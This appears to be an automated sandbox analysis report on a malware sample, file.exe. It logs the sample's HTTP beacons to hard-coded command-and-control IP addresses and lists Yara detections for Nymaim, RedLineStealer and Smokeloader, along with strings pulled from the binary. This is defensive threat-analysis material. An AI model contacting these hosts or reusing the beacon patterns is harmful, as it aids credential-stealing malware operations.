                  Source: global trafficHTTP traffic detected: GET /powfhxhxcjzx/ping.php?sub=NOSUB&stream=mixtwo&substream=mixinte HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 208.67.104.97Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /storage/ping.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 0Host: 107.182.129.235Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /storage/extension.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 107.182.129.235Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
                  Source: file.exe, 00000000.00000000.429365975.00000000008EA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                  E-Banking Fraud

                  barindex
                  Yara detected Nymaim
                  Source: Yara matchFile source: 0.0.file.exe.400000.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.860e67.24.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.860e67.16.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.11.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.31.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.860e67.20.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.860e67.24.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.860e67.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.21.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.31.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.860e67.16.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.860e67.10.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.860e67.28.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.27.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.19.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.860e67.32.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.19.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.860e67.18.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.860e67.20.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.23.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.860e67.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.3.file.exe.8a0000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.860e67.14.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.25.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.860e67.30.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.860e67.18.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.9.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.860e67.12.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.860e67.22.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.11.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.13.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.860e67.26.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.17.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.860e67.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.860e67.30.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.860e67.32.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.860e67.22.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.13.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.860e67.26.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.860e67.10.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.29.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.15.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.29.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.860e67.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.15.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.21.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.860e67.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.860e67.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.3.file.exe.8a0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.23.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.860e67.28.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.17.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.860e67.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.27.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.860e67.12.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.25.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.860e67.14.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.860e67.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000000.423202429.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.398224905.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.429736065.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.442523411.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.398439269.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.429893490.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.403746103.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.435884900.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.444030795.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.387732465.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.436582562.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.389024466.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.429105410.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.397514414.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.404645507.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.443712721.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.397232349.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.404463873.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.449688611.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.384726127.00000000008A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.423616490.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.449473682.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.403954435.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.422077182.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.436080852.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.429267314.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.436745774.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.442728263.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.450741403.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.388613281.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.450525334.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.421209172.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.387383438.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 00000000.00000000.436811597.00000000008F9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000000.00000000.404054334.00000000008F9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000000.00000000.404703322.00000000008F9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000000.00000000.397772585.00000000008F9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000000.00000000.398439269.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000000.00000000.429893490.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000000.00000000.449787339.00000000008F9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000000.00000000.444030795.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000000.00000000.387732465.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000000.00000000.398529182.00000000008F9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000000.00000000.389024466.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000000.00000000.397514414.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000000.00000000.389435332.00000000008F9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000000.00000000.429950060.00000000008F9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000000.00000000.404645507.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000000.00000000.429384361.00000000008F9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000000.00000000.422448274.00000000008F9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000000.00000000.442925431.00000000008F9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000000.00000000.449688611.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000000.00000000.423616490.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000000.00000000.403954435.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000000.00000000.422077182.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000000.00000000.436080852.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000000.00000000.450901670.00000000008F9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000000.00000000.429267314.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000000.00000000.388203778.00000000008F9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000000.00000000.436745774.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000000.00000000.442728263.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000000.00000000.450741403.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000000.00000000.423688674.00000000008F9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000000.00000000.436219416.00000000008F9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000000.00000000.444122834.00000000008F9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Binary is likely a compiled AutoIt script file
                  Source: file.exe, 00000000.00000003.491436583.0000000003CAD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: S D S O F T W A R E \ C l a s s e s \ \ C L S I D \ \ \ I P C $ This is a third-party compiled AutoIt script. " r u n a s E r r o r a l l o c a t i n g m e m o r y . S e A s s i g n P r i m a r y T o k e n P r i v i l e g e S e I n c r e a s e Q u o t a P r i v i l e g e S e B a c k u p P r i v i l e g e S e R e s t o r e P r i v i l e g e w i n s t a 0 d e f a u l t w i n s t a 0 \ d e f a u l t C o m b o B o x L i s t B o x | S H E L L D L L _ D e f V i e w l a r g e i c o n s d e t a i l s s m a l l i c o n s l i s t C L A S S C L A S S N N R E G E X P C L A S S I D N A M E X Y W H I N S T A N C E T E X T % s % u % s % d L A S T [ L A S T A C T I V E [ A C T I V E H A N D L E = [ H A N D L E : R E G E X P = [ R E G E X P T I T L E : C L A S S N A M E = [ C L A S S : A L L [ A L L ] H A N D L E R E G E X P T I T L E T I T L E T h u m b n a i l C l a s s A u t o I t 3 G U I C o n t a i n e r
                  Source: file.exe, 00000000.00000003.492189932.0000000003CA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: S D S O F T W A R E \ C l a s s e s \ \ C L S I D \ \ \ I P C $ This is a third-party compiled AutoIt script. " r u n a s E r r o r a l l o c a t i n g m e m o r y . S e A s s i g n P r i m a r y T o k e n P r i v i l e g e S e I n c r e a s e Q u o t a P r i v i l e g e S e B a c k u p P r i v i l e g e S e R e s t o r e P r i v i l e g e w i n s t a 0 d e f a u l t w i n s t a 0 \ d e f a u l t C o m b o B o x L i s t B o x | S H E L L D L L _ D e f V i e w l a r g e i c o n s d e t a i l s s m a l l i c o n s l i s t C L A S S C L A S S N N R E G E X P C L A S S I D N A M E X Y W H I N S T A N C E T E X T % s % u % s % d L A S T [ L A S T A C T I V E [ A C T I V E H A N D L E = [ H A N D L E : R E G E X P = [ R E G E X P T I T L E : C L A S S N A M E = [ C L A S S : A L L [ A L L ] H A N D L E R E G E X P T I T L E T I T L E T h u m b n a i l C l a s s A u t o I t 3 G U I C o n t a i n e r
                  Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 00000000.00000000.436811597.00000000008F9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000000.00000000.404054334.00000000008F9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000000.00000000.404703322.00000000008F9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000000.00000000.397772585.00000000008F9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000000.00000000.398439269.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000000.00000000.429893490.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000000.00000000.449787339.00000000008F9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000000.00000000.444030795.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
